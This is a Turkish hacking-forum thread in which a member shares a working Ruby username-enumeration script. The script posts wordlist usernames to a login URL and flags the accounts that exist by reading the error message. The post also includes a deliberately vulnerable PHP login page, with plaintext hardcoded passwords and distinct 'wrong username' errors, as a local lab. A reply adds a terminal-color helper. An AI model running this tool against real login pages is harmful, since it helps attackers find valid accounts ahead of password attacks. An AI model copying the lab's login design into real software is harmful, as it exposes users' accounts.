User Enumeration Tool | Ruby

GHOSTJEONSA

Yeni üye
5 May 2020
44
21
Ruby ile basit bir Username Enumeration aracı yazdım.
Enumeration nedir? diyorsanız önce User Enumeration Nedir? konuma göz atmalısınız!
optparse, net/http ve colorize kütüphaneleri kullanılmıştır.

Ruby:
require 'optparse'
require 'net/http'
require 'colorize'

options = {}

opt_parser = OptionParser.new do |opts|
  opts.banner = "Usage : enum.rb -w [WORDLİST] -u [host ip / URL] -h [help]"
  opts.on("-w usernames") do |usernames|
    options[:usernames] = usernames
  end
  opts.on("-u host") do |host|
    options[:host] = host
  end
  opts.on("-h") do
    puts opts
    exit
  end
end
opt_parser.parse!
dosya_yolu = options[:usernames]
usernames = File.readlines(options[:usernames]).map(&:strip)
puts "
 ░░░░░██╗███████╗░█████╗░███╗░░██╗░██████╗░█████╗░
 ░░░░░██║██╔════╝██╔══██╗████╗░██║██╔════╝██╔══██╗
 ░░░░░██║█████╗░░██║░░██║██╔██╗██║╚█████╗░███████║
 ██╗░░██║██╔══╝░░██║░░██║██║╚████║░╚═══██╗██╔══██║
 ╚█████╔╝███████╗╚█████╔╝██║░╚███║██████╔╝██║░░██║
 ░╚════╝░╚══════╝░╚════╝░╚═╝░░╚══╝╚═════╝░╚═╝░░╚═╝
 
 ███████╗███╗░░██╗██╗░░░██╗███╗░░░███╗███████╗██████╗░░█████╗░████████╗░█████╗░██████╗░
 ██╔════╝████╗░██║██║░░░██║████╗░████║██╔════╝██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗
 █████╗░░██╔██╗██║██║░░░██║██╔████╔██║█████╗░░██████╔╝███████║░░░██║░░░██║░░██║██████╔╝
 ██╔══╝░░██║╚████║██║░░░██║██║╚██╔╝██║██╔══╝░░██╔══██╗██╔══██║░░░██║░░░██║░░██║██╔══██╗
 ███████╗██║░╚███║╚██████╔╝██║░╚═╝░██║███████╗██║░░██║██║░░██║░░░██║░░░╚█████╔╝██║░░██║
 ╚══════╝╚═╝░░╚══╝░╚═════╝░╚═╝░░░░░╚═╝╚══════╝╚═╝░░╚═╝╚═╝░░╚═╝░░░╚═╝░░░░╚════╝░╚═╝░░╚═╝".colorize(:cyan)
# Yanıtı kontrol etme
found = []
usernames.each do |username| 
    host = options[:host]
    url = URI(host)   
    data = {
     'username' => username,
     'password' => 'sifre'}
    request = Net::HTTP::Post.new(url.path)
    request.set_form_data(data)
    response = Net::HTTP.start(url.host, url.port) do |http|
      http.request(request)
    end
    
case response
when Net::HTTPSuccess
     response_body = response.body.force_encoding('UTF-8')    
     if response_body.include?("Kullanıcı adı yanlış!")
      puts "#{username} ==> YANLIŞ!".colorize(:red)
     else
      puts "Kullanıcı Bulundu. Kullanıcı adı : #{username}".colorize(:green)
      found << username
     end
else
  puts "İstek basarisiz oldu. Hata kodu: #{response.code}, Hata mesaji: #{response.message}"
end
end
puts
puts "Bulunan kullanıcılar: #{found.join(', ')}".colorize(:blue) if found.any?

Zafiyete uygun php lab kodu:
PHP:
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Giriş Formu</title>
</head>
<body>
  <h2>Giriş Formu</h2>
  <form method="post">
    <label for="username">Kullanıcı Adı:</label><br>
    <input type="text" id="username" name="username"><br>
    <label for="password">Şifre:</label><br>
    <input type="password" id="password" name="password"><br><br>
    <input type="submit" value="Giriş Yap">
  </form>

  <?php
  // Kullanıcı adı ve şifrelerin saklandığı dizi
  $users = array(
    "adminim" => "sifrem",
    "user1" => "sifre1",
    "user2" => "sifre2"
    // İstediğiniz kadar kullanıcı adı ve şifresini buraya ekleyebilirsiniz
  );

  // Kullanıcı adı ve şifre kontrolü
  if ($_SERVER["REQUEST_METHOD"] == "POST") {
    $inputUsername = $_POST["username"];
    $inputPassword = $_POST["password"];

    // Kullanıcı adı doğrulama
    if (array_key_exists($inputUsername, $users)) {
      if ($inputPassword === $users[$inputUsername]) {
        echo "<p>Giriş Başarılı!</p>";
      } else {
        echo "<p style='color:red;'>Şifre yanlış!</p>";
      }
    } else {
      echo "<p style='color:red;'>Kullanıcı adı yanlış!</p>";
    }
  }
  ?>
</body>
</html>

Php kodunu localde çalıştırıp toolu deneyebilirsiniz.
1 - 2 ufak şey ekleyip github linki de paylaşacağım.

ruby enumerator.rb -u http://127.0.0.1/login.php -w user.txt ile kullanabilirsiniz!
ruby enumerator.rb -h ile kullanım detaylarına erişebilirsiniz!
 

Bunjo

Ar-Ge Ekibi Asistanı
14 Ara 2020
1,605
1,927
Senior Ruby
Eline sağlık dostum. 👏

Colorize kurmak yerine koduna ekleyebilirsin.

Ruby:
class String
 def red;     colorize(self, "\e[1m\e[31m"); end
 def dark_red;  colorize(self, "\e[31m");   end
 def green;    colorize(self, "\e[1m\e[32m"); end
 def dark_green; colorize(self, "\e[32m");   end
 def yellow;   colorize(self, "\e[1m\e[33m"); end
 def dark_yellow; colorize(self, "\e[33m");   end
 def blue;    colorize(self, "\e[1m\e[34m"); end
 def dark_blue;  colorize(self, "\e[34m");   end
 def purple;   colorize(self, "\e[1;35m");  end
 def dark_purple; colorize(self, "\e[35m");   end
 def cyan;    colorize(self, "\e[1;36m");  end
 def dark_cyan;  colorize(self, "\e[36m");   end
 def black;    colorize(self, "\e[30m");   end
 def grey;    colorize(self, "\e[90m");   end
 def white;    colorize(self, "\e[37m");   end
 def reset;    colorize(self, "\e[0m\e[28m"); end
 def bold;    colorize(self, "\e[1m");    end
 def colorize(text, color_code) "#{color_code}#{text}\e[0m" end
end
 

GHOSTJEONSA

Yeni üye
5 May 2020
44
21
Eline sağlık dostum. 👏

Colorize kurmak yerine koduna ekleyebilirsin.

Ruby:
class String
 def red;     colorize(self, "\e[1m\e[31m"); end
 def dark_red;  colorize(self, "\e[31m");   end
 def green;    colorize(self, "\e[1m\e[32m"); end
 def dark_green; colorize(self, "\e[32m");   end
 def yellow;   colorize(self, "\e[1m\e[33m"); end
 def dark_yellow; colorize(self, "\e[33m");   end
 def blue;    colorize(self, "\e[1m\e[34m"); end
 def dark_blue;  colorize(self, "\e[34m");   end
 def purple;   colorize(self, "\e[1;35m");  end
 def dark_purple; colorize(self, "\e[35m");   end
 def cyan;    colorize(self, "\e[1;36m");  end
 def dark_cyan;  colorize(self, "\e[36m");   end
 def black;    colorize(self, "\e[30m");   end
 def grey;    colorize(self, "\e[90m");   end
 def white;    colorize(self, "\e[37m");   end
 def reset;    colorize(self, "\e[0m\e[28m"); end
 def bold;    colorize(self, "\e[1m");    end
 def colorize(text, color_code) "#{color_code}#{text}\e[0m" end
end
Teşekkür ederim ilerleyen çalışmalarımda mutlaka kullanacağım.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.